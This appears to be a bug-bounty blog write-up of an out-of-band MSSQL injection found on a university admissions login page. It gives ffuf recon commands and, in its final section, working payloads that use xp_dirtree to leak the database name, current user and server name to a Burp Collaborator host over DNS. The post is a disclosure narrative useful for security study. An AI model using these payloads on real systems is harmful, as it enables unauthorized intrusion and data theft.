Disclaimer: This article is for educational purposes only. The techniques described should only be used on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.
Hi everyone! Hope you're all doing well. It's been a while since my last article — probably a few months. Work and university responsibilities have really taken up most of my time, to the point where it's been hard to just sit down and write, even though there were so many things I wanted to share and document. This time, I'm coming back with an interesting story related to an Out-of-Band SQL Injection.
What is Out-of-Band SQL Injection?
Out-of-band SQL injection (OOB SQLi) is an SQL injection technique where the attacker doesn't receive data through the same communication channel but instead forces the application to send information to an attacker-controlled endpoint. This attack works only if the database server supports functions that trigger DNS or HTTP requests — which most major SQL servers do.
It all started when I joined a VDP program at a university in my area. Let's just call it site.com. When I tried accessing site.com, it showed a 403 Forbidden page.
403 Forbidden
Initial Reconnaissance
Before continuing with other enumerations, I first checked what technologies were being used and whether there was any WAF by using the Wappalyzer extension and wafw00f.
Wappalyzer
wafw00f
From the analysis, we can see that it's using Windows Server and there is no WAF. Therefore, we proceed with directory fuzzing using ffuf.
ffuf -u https://site.com/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -fs 0 -c
Explanation of the command:
- ffuf : runs the ffuf tool
- -u : target URL
- -w : wordlist (for this fuzzing, I used wordlists from SecLists)
- -fs 0 : filter to avoid responses with size 0
- -c : colorizes the output, just to make it look a bit more "hacker-like" :')
ffuf output
From the directory fuzzing results, there is an admissions directory that returned a 200 status. I then tried fuzzing it again using the following command:
ffuf -u https://site.com/admissions/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -fs 0 -c
And I got several results such as auth and others.
Quick Note: ffuf itself can be used very flexibly. For example, if you want to perform subdomain enumeration, you can use a command like:
ffuf -u http://FUZZ.target.com -H "Host: FUZZ.target.com" -w wordlists-subdo.txt -c -fs 0
You can also use it for API fuzzing and more.
In my browser, I accessed https://site.com/admissions/auth and got a login page.
Login page
burpsuite login request
Testing the Login Page
I registered an account and tried exploring the login page using SQL bypass techniques and other injections. However, none of them produced any results.
I also tried fuzzing and enumerating other directories or ports, but everything returned 403. After two hours of searching and finding nothing, I decided to step back for a moment and make myself a cup of coffee.
The Breakthrough
After resting and finishing my coffee, I came back and started to wonder — why not try injecting with MSSQL-specific payloads, considering the website is running on Windows Server? So I looked for references on the internet related to SQL injection payloads for Windows Server, expanded them using AI to generate a list of payloads, and then used Intruder to fuzz them.
One of the SQL injection payload lists: https://github.com/payloadbox/sql-injection-payload-list
sql injection payload list
I configured the injection to place the payload after kubochan@gmail.com[INJECT] and set a delay of 1200 ms to ensure the payload would execute. After waiting for a while, I received a response from Intruder that caught my attention.
Most of the responses were 547, containing the message "You have to confirm your account first through…". However, I received one 577 response with the message "Login Invalid, Email not found, Try Again".
This is just an illustration, because I forgot to screenshot.
Hmm, this is interesting. I checked the request that produced that response, and the payload was:
kubochan@gmail.com';declare @q varchar(99);set @q='\\\\quodnermxkdhmpguab8u675wenke85wu.oastify.com\\nny'; exec master.dbo.xp_dirtree @q; --
Suddenly, my enthusiasm ignited — it felt like seeing a ray of light. That was my initial thought, but even after three hours, I still hadn't made any real progress. After exploring further, I realized there might be a character limit in place, so I tried splitting the original payload into:
kubochan@gmail.com';declare @q varchar(99);set @q='\\\\quodnermxkdhmpguab8u675wenke85wu.oasti'+'fy.com\\nny'; exec master.dbo.xp_dirtree @q; --
Success! When I split the payload using +, I received a response on my Burp Collaborator containing a DNS callback.
burpsuite payload
burpsuite collaborator response
I smiled, realizing that this was an Out-of-Band SQL Injection. But this still didn't show its critical impact. So I spent the next two hours crafting payloads until I finally produced several that worked, because there were specific conditions required for the payload to execute.
Final Payloads
Here is the list of working payloads I created:
Get Database Name
';declare @q varchar(99);set @q='\\\\'+DB_NAME()+'.k7s7084gaeqbzjton5loj1iqrhx8l99y.oasti'+'fy.com\\a'; exec master.dbo.xp_dirtree @q;--
oob sql injection payload - get database name
Get Current User
';declare @q varchar(99);set @q='\\\\'+SYSTEM_USER+'.7y6urvv311hyq6kbescbao9di4ovcz0o.oasti'+'fy.com\\a'; exec master.dbo.xp_dirtree @q;--
oob sql injection payload - get current user
Get Server Name
';declare @q varchar(99);set @q='\\\\'+@@SERVERNAME+'.r80e1f5nblri0quvocmvk8jxsoyfmka9.oasti'+'fy.com\\a'; exec master.dbo.xp_dirtree @q;--
oob sql injection payload - get server name
If you're wondering how I figured it out, it was simply curiosity — I spent time reading and experimenting through trial and error. I initially intended to push it further to achieve RCE, but I felt it wasn't necessary. I immediately submitted a report to the VDP program.
Me when I found the vulnerability
Pro Tip: If you encounter a request that consistently produces identical responses, it's something worth investigating further. You can continue your testing using methods such as time-based SQLi, blind injection, or other relevant exploitation techniques to confirm whether a vulnerability exists.
Conclusion
Writing this down reminded me how much I enjoy breaking apart real security issues. The process of analyzing it and turning it into a narrative felt genuinely refreshing.
And this wasn't just a minor bug — an Out-of-Band SQL Injection is a serious vulnerability. It was the first time I had the chance to dive this deep into one, and I don't often encounter findings like this. Hopefully the story makes sense and gives a clear picture of what happened.
Maybe that's all from me. I'm RyuuKhagetsu, see you in next article.
Related Articles
Explore more cybersecurity insights and techniques
